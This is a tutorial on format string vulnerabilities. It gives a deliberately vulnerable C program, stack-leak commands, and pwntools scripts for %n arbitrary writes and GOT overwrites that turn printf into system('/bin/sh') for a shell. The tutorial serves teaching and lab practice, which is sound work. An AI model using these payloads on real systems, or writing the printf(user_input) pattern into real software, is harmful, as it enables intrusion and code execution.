Format String Vulnerabilities

Overview

A format string vulnerability occurs when user-controlled input is passed directly as the format argument to printf, fprintf, sprintf, or a similar function. Each conversion specifier such as %x, %s, or %n makes the function fetch another argument, whether or not the caller supplied one, so it reads whatever happens to be in the argument registers and on the stack. An attacker can use %x, %p, and %s to leak memory contents and %n to write a chosen value to a chosen address.

ATT&CK Mapping

  • Tactic: TA0002 - Execution
  • Technique: T1203 - Exploitation for Client Execution

Prerequisites

  • A binary where user input reaches a printf-family function as the format string (not as an argument to a format string)
  • GDB with pwndbg for debugging
  • pwntools for exploit scripting

Vulnerable vs Safe Code

// VULNERABLE — user input IS the format string
printf(user_input);
fprintf(stderr, user_input);
sprintf(buf, user_input);

// SAFE — user input is an argument, not the format string
printf("%s", user_input);
fprintf(stderr, "%s", user_input);
sprintf(buf, "%s", user_input);   // no format string bug, but unbounded: prefer snprintf(buf, sizeof(buf), ...)

Vulnerable Code Example

// fmtvuln.c — compile with: gcc -fno-stack-protector -no-pie -o fmtvuln fmtvuln.c
#include <stdio.h>

int main() {
    char buf[256];
    while (fgets(buf, sizeof(buf), stdin)) {
        printf(buf);     // format string vulnerability
    }
    return 0;
}

Format Specifiers for Exploitation

Specifier  Action                                                             Exploit Use
%x         Print next argument as 4-byte hex                                  Leak stack values
%lx        Print next argument as 8-byte hex (64-bit)                         Leak 64-bit addresses
%p         Print next argument as a pointer (0x-prefixed hex on glibc)       Leak addresses
%s         Print string at the address held in next argument                  Leak memory at pointer
%n         Write byte count printed so far (int) to address in next argument  Arbitrary write
%hn        Same as %n, but write 2 bytes (short)                              Partial write
%hhn       Same as %n, but write 1 byte (char)                                Byte-level write
%<N>$x     Print Nth argument (direct parameter access)                       Target specific stack offset
%<N>$n     Write to the address held in the Nth argument                      Write to specific offset

Reading Stack Values (Information Leak)

Sequential Leak

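On x86-64 (System V ABI), printf takes its first five variadic arguments from the registers RSI, RDX, RCX, R8, and R9. From the sixth argument onward, each %lx consumes the next 8 bytes from the stack: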

# Send to the vulnerable binary
echo 'AAAAAAAA.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx' | ./fmtvuln

Output:

AAAAAAAA.7fffffffdf80.0.0.4141414141414141.786c252e786c252e.786c252e786c252e...

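The value 0x4141414141414141 is the AAAAAAAA from the input itself. Its position in the output (the fourth value in this sample) is the argument index at which your input starts. The index depends on the binary and the compiler; the later examples assume 6.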
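
Reading a leak by eye is error-prone because each value is printed as a little-endian integer, so the bytes appear reversed. The following is a minimal sketch, using only the Python standard library, that decodes a dot-separated %lx leak back into raw bytes and reports where the marker sits. The function name decode_leak and the sample line are hypothetical, chosen for illustration.

```python
def decode_leak(line: str, marker: bytes = b"AAAAAAAA"):
    """Decode dot-separated %lx output into 8-byte little-endian chunks.

    Returns (chunks, offset), where offset is the 1-based argument index
    whose bytes equal the marker, or None if the marker was not leaked.
    """
    # The first field is the marker echoed back by printf, not a leaked value.
    fields = line.strip().split(".")[1:]
    chunks = [int(field, 16).to_bytes(8, "little") for field in fields if field]
    offset = chunks.index(marker) + 1 if marker in chunks else None
    return chunks, offset


# Hypothetical output line, shaped like the sample above.
sample = "AAAAAAAA.7fffffffdf80.0.0.4141414141414141.786c252e786c252e"
chunks, offset = decode_leak(sample)
print(offset)      # 4
print(chunks[4])   # b'.%lx.%lx'
```

The value after the marker decodes to the start of the format string itself, which confirms that the leak is walking through the input buffer.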

Direct Parameter Access

Use %N$lx to read specific stack positions without consuming intermediate values:

# Read the 6th argument from the stack
echo '%6$lx' | ./fmtvuln

# Read positions 1 through 20
for i in $(seq 1 20); do echo "%${i}\$p" | ./fmtvuln; done

Finding Your Input Offset

The offset where your input appears on the stack is critical for write exploits. Identify it by looking for 0x4141414141414141 in the output:

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = './fmtvuln'

# Find the offset where our input appears on the stack
for i in range(1, 30):
    p = process('./fmtvuln')
    p.sendline(f'AAAAAAAA%{i}$lx'.encode())
    result = p.recvline()
    p.close()                      # close every process, including the matching one
    if b'4141414141414141' in result:
        log.success(f'Input at offset: {i}')
        break

Arbitrary Write with %n

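The %n specifier writes the number of characters printed so far to the address held in the corresponding argument. By placing a target address in your input buffer (which lives on the stack) and pointing %n at the argument index where that address lands, you write to that address. On x86-64 the packed address contains null bytes, and printf stops parsing at the first null byte, so the address must come after the format specifiers.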

Writing a Small Value

To write the value 0x42 (66 decimal) to address 0x404060:

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = './fmtvuln'

target_addr = 0x404060    # address to write to
write_value = 0x42        # value to write
input_offset = 6          # where our input appears on the stack

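# printf stops at the first null byte, and p64(target_addr) contains several,
# so the address goes after the specifiers. Padding the format part to 16 bytes
# puts the address two 8-byte slots past the start of the input.
fmt = f'%{write_value}c%{input_offset + 2}$hhn'.encode()
payload = fmt.ljust(16, b'A') + p64(target_addr)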

p = process('./fmtvuln')
p.sendline(payload)
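
The payload layout for a single-byte write can be sketched without pwntools. This is an illustration under stated assumptions, not a general exploit builder: it assumes x86-64 with 8-byte argument slots, that the input starts exactly at argument index input_offset, and that the payload contains no newline byte (fgets would cut it short). The function name build_hhn_write is hypothetical. It places the address last because the packed address contains null bytes, and it works out which argument index the address lands on after padding.

```python
import struct


def build_hhn_write(target_addr: int, value: int, input_offset: int) -> bytes:
    """Build a one-byte %hhn write with the target address placed last."""
    if not 0 <= value <= 0xFF:
        raise ValueError("value must fit in one byte")
    # %hhn stores the output count modulo 256, so printing 256 bytes stores 0.
    count = value if value else 256
    slots = 1  # number of 8-byte slots reserved for the format part
    while True:
        index = input_offset + slots  # argument index where the address lands
        fmt = f"%{count}c%{index}$hhn".encode()
        if len(fmt) <= slots * 8:
            break
        slots += 1
    # Padding printed after %hhn does not change the value already written.
    return fmt.ljust(slots * 8, b"A") + struct.pack("<Q", target_addr)


payload = build_hhn_write(0x404060, 0x42, 6)
print(payload[:16])   # b'%66c%8$hhnAAAAAA'
print(len(payload))   # 24
```

With an input offset of 6, the format part occupies indexes 6 and 7, so the address is read as argument 8.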

pwntools fmtstr_payload

pwntools provides fmtstr_payload() to automate format string writes:

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = elf = ELF('./fmtvuln')

# Offset where input appears on the stack
input_offset = 6

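# Write a value to an address
# fmtstr_payload(offset, {addr: value})
# Assumes the binary imports system(), so elf.symbols['system'] resolves to its
# PLT stub. fmtvuln.c above does not; there, leak a libc address first and use
# the system address computed from the libc base.
payload = fmtstr_payload(input_offset, {elf.got['printf']: elf.symbols['system']})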

p = process('./fmtvuln')
p.sendline(payload)
p.sendline(b'/bin/sh')    # next printf call now calls system("/bin/sh")
p.interactive()

fmtstr_payload parameters:

  • First argument: the stack offset where input appears
  • Second argument: dictionary of {address: value} pairs to write
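
To see the arithmetic that such a helper has to automate, the sketch below computes the padding needed before each successive %hhn when a multi-byte value is written one byte at a time. It is a simplified illustration, not pwntools' actual algorithm (which may, for example, reorder writes); the function name hhn_padding_plan and the value 0x401136 are hypothetical.

```python
def hhn_padding_plan(value: int, nbytes: int, already_printed: int = 0):
    """Return (byte index, wanted byte, padding) for successive %hhn writes."""
    plan = []
    printed = already_printed
    for i in range(nbytes):
        wanted = (value >> (8 * i)) & 0xFF   # byte i, least significant first
        pad = (wanted - printed) % 256       # %hhn keeps only the low 8 bits
        printed += pad
        plan.append((i, wanted, pad))
    return plan


for i, wanted, pad in hhn_padding_plan(0x401136, 3):
    print(f"byte {i}: want 0x{wanted:02x}, pad {pad}")
# byte 0: want 0x36, pad 54
# byte 1: want 0x11, pad 219
# byte 2: want 0x40, pad 47
```

Because the running count only ever grows, a byte smaller than the previous one is reached by wrapping past 256. A padding of 0 means no %c is emitted for that write, since %0c would still print one character.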

GOT Overwrite via Format String

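The Global Offset Table (GOT) holds the runtime addresses of imported library functions, filled in by the dynamic linker. On binaries with Partial RELRO (or no RELRO), the GOT entries used for function calls stay writable; Full RELRO makes them read-only. Overwriting a writable GOT entry redirects future calls to that function.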

Common targets:

Overwrite    With     Effect
printf@GOT   system   Next printf(input) becomes system(input)
puts@GOT     system   Next puts(input) becomes system(input)
exit@GOT     main     Prevents exit, loops back for more writes

# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *

context.binary = elf = ELF('./fmtvuln')

# Overwrite printf GOT entry with system
# (assumes the binary imports system(); otherwise use an address from a libc leak)
payload = fmtstr_payload(6, {elf.got['printf']: elf.symbols['system']})

p = process('./fmtvuln')
p.sendline(payload)

# Now printf calls system — send a command
p.sendline(b'/bin/sh')
p.interactive()

This only works with:

  • Partial RELRO or no RELRO (GOT is writable)
  • No PIE (GOT address is known), or PIE with a leaked binary base
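
One way to check the RELRO condition is to look at the output of readelf -l and readelf -d for the target. The sketch below applies a common heuristic to that text: a GNU_RELRO segment combined with immediate binding means Full RELRO, a GNU_RELRO segment alone means Partial RELRO. The function name classify_relro and the excerpts are hypothetical, and the heuristic itself is an assumption rather than an authoritative test.

```python
import re


def classify_relro(program_headers: str, dynamic_section: str) -> str:
    """Classify RELRO from the text of `readelf -l` and `readelf -d`."""
    if "GNU_RELRO" not in program_headers:
        return "none"
    # Immediate binding shows up as a BIND_NOW entry or as NOW in FLAGS_1.
    bind_now = "BIND_NOW" in dynamic_section or any(
        "FLAGS_1" in line and re.search(r"\bNOW\b", line)
        for line in dynamic_section.splitlines()
    )
    return "full" if bind_now else "partial"


# Hypothetical excerpts, shortened for illustration.
headers = "  GNU_RELRO      0x0000000000002e10 0x0000000000403e10"
lazy = " 0x0000000000000015 (DEBUG)              0x0"
eager = " 0x000000006ffffffb (FLAGS_1)            Flags: NOW"

print(classify_relro(headers, lazy))    # partial
print(classify_relro(headers, eager))   # full
print(classify_relro("", lazy))         # none
```

A result of "partial" or "none" suggests the GOT overwrite is worth attempting; "full" means another write target is needed.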

Debugging Format Strings

# GDB
# https://www.gnu.org/software/gdb/
gdb ./fmtvuln

# Break at printf
(gdb) break printf

# Run and send format string (single quotes keep the shell from expanding $lx)
(gdb) run <<< 'AAAA%6$lx'

# When printf is hit, examine the stack
(gdb) x/20xg $rsp

# RDI holds the format string. The variadic arguments start at RSI (%1$),
# then RDX (%2$), RCX (%3$), R8 (%4$), R9 (%5$), then stack positions (%6$ onward)
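
The register and stack mapping above can be written as a small lookup, which helps when matching a %N$ index against what GDB shows. This sketch assumes the System V AMD64 calling convention, integer arguments only, and that execution is stopped at printf's very first instruction (for example with break *printf), so that RSP still points at the return address. The function name arg_location is hypothetical.

```python
REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]


def arg_location(n: int) -> str:
    """Return where the value for %n$ lives at printf's entry point."""
    if n < 1:
        raise ValueError("argument indexes start at 1")
    if n <= len(REGISTERS):
        return REGISTERS[n - 1]
    # [rsp] holds the return address, so the first stack argument is at rsp+8.
    return f"[rsp+{8 * (n - len(REGISTERS))}]"


for n in (1, 5, 6, 8):
    print(n, arg_location(n))
# 1 rsi
# 5 r9
# 6 [rsp+8]
# 8 [rsp+24]
```

In GDB, the value for %6$lx would then be inspected with x/gx $rsp+8 under the same assumptions.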
